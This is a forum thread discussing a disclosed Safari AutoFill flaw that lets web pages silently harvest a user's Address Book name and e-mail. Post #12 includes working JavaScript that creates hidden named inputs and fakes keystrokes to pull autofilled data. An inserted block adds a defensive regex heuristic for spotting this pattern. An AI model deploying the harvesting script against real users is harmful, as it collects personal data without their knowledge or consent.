
Security researcher demos autofill exploit in Apple Safari

post #1 of 28
Thread Starter 
The autofill feature found in Apple's Safari Web browser could be used by a hacker to illegally obtain a user's personal information, including their name and e-mail address, a security researcher has discovered.

Jeremiah Grossman revealed on his blog this week that users who have the "AutoFill web forms" feature enabled on Safari versions 4 and 5 are vulnerable to malicious code. The AutoFill feature is enabled by default in Apple's Web browser.

The feature automatically fills online text forms that have specific, common names, such as "name," "company," "city," "state," "e-mail," and more. The information is automatically grabbed from the user's personal record included in the operating system's address book. That means the information could be obtained without the user even entering it into the Safari browser.

"All a malicious website would have to do to surreptitiously extract Address Book card data from Safari is dynamically create form text fields with the aforementioned names, probably invisibly, and then simulate A-Z keystroke events using JavaScript," Grossman wrote. "When data is populated, that is AutoFill'ed, it can be accessed and sent to the attacker."

He also created a proof-of-concept to show how it takes "mere seconds" to obtain the personal information. Grossman said the data could be used to send e-mail spam or conduct a phishing attack.



"Fortunately any AutoFill data starting with a number, such as phone numbers or street addresses, could not be obtained because for some reason the data would not populate in the text field," he said. "Still, such attacks could be easily and cheaply distributed on a mass scale using an advertising network where likely no one would ever notice because it's not exploit code designed to deliver rootkit payload."

Safari 5, the latest version of Apple's Web browser, was released in June. It added extensions and expanded HTML5 support for the desktop software.
post #2 of 28
Quote:
Originally Posted by AppleInsider View Post

The autofill feature found in Apple's Safari Web browser could be used by a hacker to illegally obtain a user's personal information, including their name and e-mail address, a security researcher has discovered.

Yikes that is a bad one. I unchecked it right now.

Life is too short to drink bad coffee.

post #3 of 28
I've always made sure that these two are unchecked.
post #4 of 28
I will be interested to hear the Apple response to this. I find it almost too obvious to be plausible. What malicious code has been proven to access this so far? I did disable it though
From Apple ][ - to new Mac Pro I've used them all.
Long on AAPL so biased
Google Motto "You're not the customer. You're the product."
post #5 of 28
Tested this, is confirmed (and scary). Luckily I switched over from Firefox+Safari to Chrome+Firefox a while ago. It does not seem to work on either of those 2 (I have autofill off on both though).

It would take about 30 seconds or so to find out your name, email, address, which means a video site or a long article site would be the best place for this to work.
--SHEFFmachine out
Da Bears!
post #6 of 28
Quote:
Originally Posted by digitalclips View Post

I will be interested to hear the Apple response to this. I find it almost too obvious to be plausible. What malicious code has been proven to access this so far? I did disable it though


Yep. Javascript and Ajax, the savior of the web.

I just tested the fields that have numbers. When you start the phone with a "(" it does give you a drop down list presumably using Javascript. So if you could figure out the innerHTML being used, one might be able to get that info as well. Same thing with the address field. You get a drop down select list.

I have to do some more testing. I'm curious whether SSL prevents it, but signed certificates would at least be more trustworthy.

Life is too short to drink bad coffee.

post #7 of 28
That's not good, but I use 1password.
post #8 of 28
I also uncheck that every time I install Safari. Human beings can't make perfectly secure software, that's the evidence anyway.
post #9 of 28
Could? I could break my ankle while walking.
post #10 of 28
Thanks for the info. Autofill almost wrecked a holiday earlier this year because safari auto-populated my first name onto my partner's airline ticket without me noticing. Thankfully the lady at the check-in desk was moderately understanding.
post #11 of 28
Quote:
Originally Posted by AppleInsider View Post

The autofill feature found in Apple's Safari Web browser could be used by a hacker to illegally obtain a user's personal information, including their name and e-mail address, a security researcher has discovered. ...

I don't get why this is being viewed as any kind of real issue, or why some web sites are saying that this could potentially compromise passwords and credit card info as well. It seems quite obvious that it cannot.

*IF* you have autofill turned on (and any security conscious person would not do so), and
*IF* you go to a malicious web site,

That web site can get your name and address. Wow.

I'm shakin in my boots right now. My address? Freely available to complete strangers? This is almost as bad as ...

... the phone book in every public telephone in my home town.
post #12 of 28
You can't get it to run faster than 30 seconds per field. Every key event you can fake to produce the autofill effect takes 1/2 a second, and if you interrupt that time you'll end up ruining the autocomplete hack.


function start() {
    var str = "ABCDEFGHIJKLMNOPQRSTUVWXYZ";
    var charset = str.split("");
    var d = document.getElementById('data');
    var f = [];
    var i = [];
    //var char = charset.shift();
    for (var xx = 0; xx < 26; xx++) {
        f[xx] = document.createElement('form');
        f[xx].id = 'form' + xx;
        i[xx] = document.createElement('input');
        i[xx].type = "text";
        i[xx].name = 'name';
        i[xx].id = "iname" + xx;
        f[xx].appendChild(i[xx]);
        document.getElementById('hack').appendChild(f[xx]);
        var event = document.createEvent('TextEvent');
        event.initTextEvent('textInput', true, true, null, charset[xx]);

        i[xx].value = "";
        i[xx].selectionStart = 0;
        i[xx].selectionEnd = 0;
        i[xx].focus();
        i[xx].dispatchEvent(event);
    }

    setTimeout(function() {
        for (var xx = 0; xx < 26; xx++) {
            var i = document.getElementById('iname' + xx);
            if (i.value.length > 1) {
                d.innerHTML += i.value + "<br>\n";
            }
        }
    }, 500);
}
Groupthink is bad, mkay. Think Different is the motto.
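
The pattern Grossman describes in the article, and that the script posted above reproduces (script-created fields with AutoFill names, synthetic keystrokes, then reading the value back), can be screened for when reviewing third-party scripts such as ad creatives. The following is an added example, not code from the thread or from Grossman; the signal names, regular expressions and both sample scripts are constructed assumptions.

```javascript
// Added example, not from the thread. Static heuristic for reviewing third-party
// scripts (for instance ad creatives) for the AutoFill-harvesting pattern.
// Field names are the ones quoted in the article; everything else is an assumption.
const AUTOFILL_NAMES = ["name", "company", "city", "state", "e-mail"]; // regex-safe literals
const NAME_ALT = AUTOFILL_NAMES.join("|");

const SIGNALS = {
  // A text input built by script rather than present in the page markup.
  createsInput: /createElement\(\s*['"]input['"]\s*\)/i,
  // That input is given one of the names AutoFill recognises.
  autofillName: new RegExp(
    `(?:\\.name\\s*=\\s*|setAttribute\\(\\s*['"]name['"]\\s*,\\s*)['"](?:${NAME_ALT})['"]`, "i"),
  // Keystrokes manufactured by script instead of typed by the user.
  syntheticKeys: /createEvent\(\s*['"](?:TextEvent|KeyboardEvent)['"]\s*\)|new\s+KeyboardEvent\s*\(/,
  dispatches: /\.dispatchEvent\s*\(/,
  // The field's value is read back (an assignment such as `.value = ""` does not count).
  readsValue: /\.value\s*[.;,)+]/,
};

function analyzeScript(src) {
  const hits = Object.keys(SIGNALS).filter((k) => SIGNALS[k].test(src));
  // Each signal alone is common in legitimate code; only the full combination is flagged.
  return { hits, suspicious: hits.length === Object.keys(SIGNALS).length };
}

// Constructed sample: condensed form of the pattern discussed in the thread.
const SAMPLE_HARVEST = `
var f = document.createElement('input');
f.name = 'name';
document.body.appendChild(f);
var ev = document.createEvent('TextEvent');
ev.initTextEvent('textInput', true, true, null, 'A');
f.focus(); f.dispatchEvent(ev);
setTimeout(function () { log(f.value); }, 500);
`;

// Constructed sample: an ordinary dynamically built signup form.
const SAMPLE_SIGNUP = `
var city = document.createElement('input');
city.name = 'city';
form.appendChild(city);
form.addEventListener('submit', function () { validate(city.value); });
`;

for (const [label, src] of [["harvest", SAMPLE_HARVEST], ["signup", SAMPLE_SIGNUP]]) {
  console.log(label, analyzeScript(src));
}
```

Text matching of this kind is defeated by obfuscated or dynamically assembled scripts, so a hit is a prompt for manual review and a miss proves nothing.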
post #13 of 28
Quote:
Originally Posted by Prof. Peabody View Post

I don't get why this is being viewed as any kind of real issue, or why some web sites are saying that this could potentially compromise passwords and credit card info as well. It seems quite obvious that it cannot.

*IF* you have autofill turned on (and any security conscious person would not do so), and
*IF* you go to a malicious web site,

That web site can get your name and address. Wow.

I'm shakin in my boots right now. My address? Freely available to complete strangers? This is almost as bad as ...

... the phone book in every public telephone in my home town.

If you started getting solicited with emails personally addressed to you and telemarketing on your cell phone where they address you by name (assuming it might be possible to get numbers), it might become a bit disconcerting. Nevertheless, the personal info is being harvested without your knowledge. It is not like you volunteered the information, so yes it IS a security flaw.

Life is too short to drink bad coffee.

post #14 of 28
Quote:
Originally Posted by mstone View Post

If you started getting solicited with emails personally addressed to you and telemarketing on your cell phone where they address you by name (assuming it might be possible to get numbers), it might become a bit disconcerting. Nevertheless, the personal info is being harvested without your knowledge. It is not like you volunteered the information, so yes it IS a security flaw.

Agreed that it's a security flaw.

It's just a small, weird, kind of silly security flaw IMO.

But all over the web today there are scary stories about this "awful" "dangerous" flaw. Ars is actually running with a headline that says "Apple the new world leader in software insecurity." Which is absolutely ridiculous in its implications.

As with Antennagate, the media is having fun making it seem like Apple is evil incarnate etc.
post #15 of 28
Nasty.
I think we'll see a quick security patch here. I guess a LOT of people are using Auto Fill..
post #16 of 28
How come I can't get it to Autofill anything? I'm using WebKit, which essentially uses Safari 5, only difference is the rendering engine is slightly newer. I got all blanks for everything when I ran it, so I must be doing something wrong, even though Autofill is checked for all those boxes. Well, since the test failed, I suppose I can claim I broke the test even though I used Safari
post #17 of 28
Maybe an opportunity here for someone to write a plugin that responds to auto-fill requests with a bogus address book entry - and then allow you to manually allow the correct data to be filled in.
post #18 of 28
What we really need is a Safari version of NoScript (a FF plugin). That would preclude untrusted Javascript, especially JS not from the server you are knowingly visiting, from running and completely cut off malicious JS and click-jacking as possibilities.

It does take a little bit to get it configured, but guess what, ssshhhhh ... <whispering>NoScript can also kill all the 3rd party analytic Javascript running on your browsing sessions.

If you can't get click-jacked, almost all the web malware gets cut out except for the crap like giving out your password to load video codecs...
post #19 of 28
Could it be because I have a different language set-up as default?
post #20 of 28
The autofill is really handy for all the forum, low-risk sites that require usernames and passwords. I just don't use it for banks, PayPal, etc., anything with sensitive information, plus my bank does not allow you to save passwords and usernames. Isn't it just a case of using common sense when it comes to your own security? Like someone mentioned, 1Password is a good alternative, and make sure you have firewalls activated as well as router security.
post #21 of 28
Quote:
Originally Posted by mstone View Post

If you started getting solicited with emails personally addressed to you and telemarketing on your cell phone where they address you by name (assuming it might be possible to get numbers), it might become a bit disconcerting.

It is many years since I get unsolicited telemarketing on my home phone line, personally addressed to me. It is very annoying and has obviously nothing to do with such vulnerabilities in web browsers. Companies have other and more sure means to collect personal information, with the most obvious being the telephone directory. That one is not going to disappear auto-magically after a security update.

Quote:
Originally Posted by mstone View Post

Nevertheless, the personal info is being harvested without your knowledge. It is not like you volunteered the information, so yes it IS a security flaw.

Here I agree but I don't see much potential for harm. Hopefully it will be trivial for Apple to close the hole.
post #22 of 28
Quote:
Originally Posted by Pinolox View Post

Could it be because I have a different language set-up as default?

That may be the reason. Also, if I remember correctly, Safari does not auto-complete fields in secured web pages (https), although I cannot tell if this is due to a Safari feature or to something coded in the page.
post #23 of 28
Quote:
Originally Posted by PB View Post

That may be the reason. Also, if I remember correctly, Safari does not auto-complete fields in secured web pages (https), although I cannot tell if this is due to a Safari feature or to something coded in the page.

It's not a secure page. I tried the "proof of concept" page and it didn't return anything. The closest I got to see some personal info was with Chrome, which showed autocomplete drop-down suggestions, but didn't actually fill out the field.
Camino, OTOH, somehow prevented the script from cycling through the fields.

I'm quite surprised that the language has an impact, since I thought at system-level the Address Book fields are identified by #IDs or English strings (hint: I'm not a Mac software developer).
post #24 of 28
Quote:
Originally Posted by palegolas View Post

Nasty.
I think we'll see a quick security patch here. I guess a LOT of people are using Auto Fill..

It's on by default. If you need proof of how many people keep things on by default, check the IE market share.
Groupthink is bad, mkay. Think Different is the motto.
post #25 of 28
Quote:
Originally Posted by PB View Post

That may be the reason. Also, if I remember correctly, Safari does not auto-complete fields in secured web pages (https), although I cannot tell if this is due to a Safari feature or to something coded in the page.

A malicious site wouldn't be using a secure page. This is something you'd accidentally stumble upon, not something that would accidentally happen on a page you purposely visited. Imagine that it's in a MySpace or Facebook page / app. It could compromise millions of people.
Groupthink is bad, mkay. Think Different is the motto.
post #26 of 28
Safari is not the only browser with autofill - where is the comparative analysis showing that every browser on every platform suffers from the same thing?

And where is the alert that a web page has asked my system to provide personal information even though that info is not needed and does not appear on the screen anywhere?

I am sure that is the source of lots of junk mail - I don't use my son's email except to register him for online games - but I get junk mail to his account that must be coming from sites I visit on my system which does not have a user logon for him - but on which I have an email client setup so I can keep an eye on his email.

In my opinion - ANY information AT ALL - that is requested by a web site - should pop up in a message box - indicating who is asking and why - and some option to exclude specific info if you want or to include all or exclude all and to remember this action for a given domain.

At the very least it would be interesting to learn how many 3rd parties are grabbing info without your knowledge or permission.

Yes I know I could use something like Little Snitch or private browsing (on some browsers) - but it just strikes me as wrong that every company who puts out a browser by default allows anyone who asks to be handed your private information without your knowledge or consent. That is a privacy issue that our government officials should have been asking about a decade ago.
post #27 of 28
Quote:
Originally Posted by lilgto64 View Post

Safari is not the only browser with autofill - where is the comparative analysis showing that every browser on every platform suffers from the same thing?

Apparently the difference between how Safari auto fills and how Firefox does it is that on certain fields Safari actually fills in the form fields where Firefox only offers suggestions in a pull down select list. The exploit can only grab the info after it goes into the field. Keep in mind that the form doesn't visually appear on the page. The fields only exist in memory.

Life is too short to drink bad coffee.

post #28 of 28
Quote:
Originally Posted by ihxo View Post

That's not good, but I use 1password.

Yep, same here. I also have the keychain turned off and deleted most of my data in it. I strongly suggest people look into either 1Password or LastPass.
Switching From Windows on Nov. 30th 2007
-------------------------------------
MacBook Pro 13" 2011